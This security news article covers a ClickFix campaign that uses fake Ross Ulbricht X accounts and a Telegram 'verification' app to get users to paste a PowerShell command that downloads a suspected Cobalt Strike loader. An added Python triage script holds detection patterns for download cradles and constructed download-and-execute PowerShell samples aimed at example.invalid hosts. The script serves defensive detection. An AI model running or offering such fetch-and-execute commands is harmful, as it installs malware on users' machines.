Following Ross Ulbricht’s pardon by US President Donald Trump, threat actors on X have found a new way to sully the man’s name. Hackers are using fake but verified X accounts under Ulbricht’s name to lure unsuspecting users to Telegram channels only to trick them into running malicious PowerShell code on their PCs. Candid.Technology did not find any such accounts active at the time of writing, and older accounts seem to have been suspended by X.
The attack was first spotted by vx-underground and is a variant of the ClickFix tactic that gained momentum in the cybercrime scene over 2024. The tactic gets the victim to do the work: under the pretext of verifying their identity (or fixing a bogus error), users are told to paste and run a command themselves, and that command fetches and executes code on their system that can load malware, RATs (Remote Access Trojans), or other malicious programs on their PC.
In this case, hackers are using fake accounts under Ulbricht’s name to direct people to Telegram channels presented as official Ulbricht portals offering updates on his pending release and a clemency document to sign. Once the Telegram channel opens, a fake identity-verification process called Safeguard starts and walks users through a verification flow.
Users are shown a Telegram mini app running a fake verification dialog. The mini app also silently copies a PowerShell command to the device’s clipboard, and users are prompted to open the Windows Run dialog (Win+R), paste the clipboard contents and press Enter to “verify”. The pretext is that once the command has run, the user will be redirected to the desired Telegram group or channel. Because the user, not the browser or Telegram client, launches powershell.exe, download warnings and browser sandboxing never come into play.
However, instead of verifying a user’s identity, the command executes a script that in turn downloads a ZIP file containing multiple files, including one called identity-helper.exe. At the time of writing, a VirusTotal scan of the ZIP archive showed only one of 65 security vendors flagging it as malicious, while a comment on the identity_helper.exe file on the malware analysis platform suggests it may be a Cobalt Strike loader. A low detection count on a freshly uploaded archive is not evidence that it is safe; for a new campaign, detonating the sample in a sandbox and watching its behaviour is a more reliable check than the vendor tally.
Cobalt Strike is a commercial adversary-simulation (penetration testing) tool whose Beacon implant is also widely abused by criminals to gain remote access to a compromised computer and pivot into any connected networks. Such access is typically the first stage of a large-scale ransomware deployment or data breach.
As a security precaution, Candid.Technology strongly advises readers against running any scripts or commands they find on the internet unless they understand what the command will do on their system. Reading the command before running it, including decoding any Base64-encoded portion, can reveal hidden-window flags, download-and-execute chains or other obfuscation that give the game away. No legitimate identity check requires pasting a command into the Run dialog.
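The following is an added example, not code from the article or from the reporters, showing what “reading the command before running it” looks like in practice for the clipboard-to-Run-dialog trick described above. It decodes a PowerShell -EncodedCommand payload and flags the tells a ClickFix command usually carries (hidden window, execution-policy bypass, a download cradle feeding Expand-Archive, Invoke-Expression or Start-Process). The sample commands, the example.invalid URLs and the indicator list are constructed for illustration; they are not the campaign’s real command, and a clean result does not prove a command is safe.

```python
"""Triage a command that a web page or Telegram app asks you to paste into Win+R.

Added example (not from the original article). The sample commands below are
constructed and do not come from the reported campaign.
"""
import base64
import binascii
import re
from typing import Optional

# Indicator name -> pattern. Common ClickFix tells, not an exhaustive list.
INDICATORS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("download cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|curl|wget|certutil)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("archive extraction", re.compile(r"\bexpand-archive\b", re.I)),
    ("launches a dropped binary", re.compile(r"\bstart-process\b|\.exe\b", re.I)),
    ("script host abuse", re.compile(r"\b(?:mshta|wscript|cscript)\b", re.I)),
]

URL_RE = re.compile(r"https?://[^\s'\"`;|)]+", re.I)
# -e / -ec / -enc / -encodedcommand followed by a Base64 blob ("-ep bypass" does not match).
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmd: str) -> dict:
    """Decode, then report indicators, URLs and a verdict for a pasted command."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd}\n{decoded}"
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    urls = URL_RE.findall(text)
    # Download cradle feeding execution/extraction is the ClickFix signature.
    dangerous = "download cradle" in hits and any(
        h in hits for h in ("in-memory execution", "launches a dropped binary",
                            "archive extraction"))
    verdict = "do not run" if dangerous else ("suspicious" if hits else "no indicators")
    return {"decoded": decoded, "indicators": hits, "urls": urls, "verdict": verdict}


def encode_for_powershell(script: str) -> str:
    """Produce the Base64(UTF-16LE) form PowerShell's -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples (not the real campaign command).
SAMPLE_PLAIN = (
    'powershell -w hidden -ep bypass -c "iwr https://example.invalid/verify.zip '
    "-OutFile $env:TEMP\\v.zip; Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v; "
    'Start-Process $env:TEMP\\v\\identity-helper.exe"'
)
SAMPLE_ENCODED = "powershell -nop -w hidden -enc " + encode_for_powershell(
    "irm https://example.invalid/a.ps1 | iex")
SAMPLE_BENIGN = "powershell -Command Get-Date"

if __name__ == "__main__":
    for label, cmd in (("plain", SAMPLE_PLAIN), ("encoded", SAMPLE_ENCODED),
                       ("benign", SAMPLE_BENIGN)):
        r = triage(cmd)
        print(f"[{label}] {r['verdict']}: {', '.join(r['indicators']) or '-'}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
        for u in r["urls"]:
            print("  url:", u)
```

The encoded form matters because the clipboard payload often shows only a Base64 string; decoding it as UTF-16LE (PowerShell’s encoding for -EncodedCommand) exposes the download URL and the execution step. The same indicator patterns can be run over process-creation logs where powershell.exe is spawned by explorer.exe, which is what the Run dialog produces.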